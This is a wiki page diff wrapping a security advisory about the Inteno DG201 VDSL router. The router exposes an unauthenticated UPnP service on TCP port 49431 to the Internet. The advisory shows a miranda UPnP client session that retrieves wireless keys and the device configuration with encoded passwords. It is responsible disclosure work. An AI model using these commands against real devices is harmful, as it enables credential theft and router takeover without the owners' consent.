2724
Comment:
|
2727
|
Deletions are marked like this. | Additions are marked like this. |
Line 82: | Line 82: |
* Mikko Kenttälä, Turmio @ IRCnet, mikko.kenttala@iki.fi | * Mikko Kenttälä, Turmio @ IRCnet, mikko.kenttala(ä)iki.fi |
Intro
This vulnerability is reported 2013-11-22 and it is fixed couple of month after that.
DG201 VDSL-box has some kind of UPnP -service open to the Internet by default. Even if the box has set to bridge mode, VDSL-box will take own public IP from the Internet.
From UPnP-service you can for example download device configuration which include passwords etc. It is also possible to change configuration in the device. Everything can be done without any authentication.
- Software version: DG201A-W2U4U_4.06DNT0934.2
Details
UPnP service can be found from port TCP 49431.
Get UPnP client and start using the service. I used miranda: https://code.google.com/p/miranda-upnp/
Example
I have manually added my public IP to the configuration which is basically list of hosts in python pickle.
$ python miranda.py -s upnp-inteno.mir Miranda v1.3 The interactive UPnP client Craig Heffner, http://www.devttys0.com Host data restored: [0] 10.0.2.187:8888 [1] 192.168.1.1:49431 [2] 192.168.1.1:49431 [3] 213.216.x.x:49431 [4] 85.131.x.x:49431 upnp> host get 3 Requesting device and service info for 213.216.x.x:49431 (this could take a few seconds)... Host data enumeration complete! upnp> host send 3 LANDevice WLANConfiguration GetSecurityKeys NewWEPKey3 : 1234567890123 NewWEPKey2 : 1234567890123 NewWEPKey1 : 1234567890123 NewWEPKey0 : 1234567890123 NewKeyPassphrase : NewPreSharedKey : abbaabba upnp> host send 3 InternetGatewayDevice DeviceConfig GetConfiguration NewConfigFile : <?xml version="1.0"?> <DslCpeConfig version="3.0"> <InternetGatewayDevice> <LANDeviceNumberOfEntries>1</LANDeviceNumberOfEntries> <WANDeviceNumberOfEntries>3</WANDeviceNumberOfEntries> <DeviceInfo> <ProvisioningCode>12345</ProvisioningCode> <FirstUseDate>2012-04-11T14:46:01+00:00</FirstUseDate> <VendorConfigFileNumberOfEntries>0</VendorConfigFileNumberOfEntries> </DeviceInfo> <X_BROADCOM_COM_SyslogCfg> <Status>Enabled</Status> <Option>local buffer and remote</Option> <LocalDisplayLevel>Debug</LocalDisplayLevel> <ServerIPAddress>10.0.0.1</ServerIPAddress> </X_BROADCOM_COM_SyslogCfg> <X_BROADCOM_COM_LoginCfg> <SupportPassword>ZG5hcjNzY3VlMTEyAA==</SupportPassword> <UserPassword>dXNlcgo=</UserPassword> </X_BROADCOM_COM_LoginCfg> ...
Contacts
- Mikko Kenttälä, Turmio @ IRCnet, mikko.kenttala(ä)iki.fi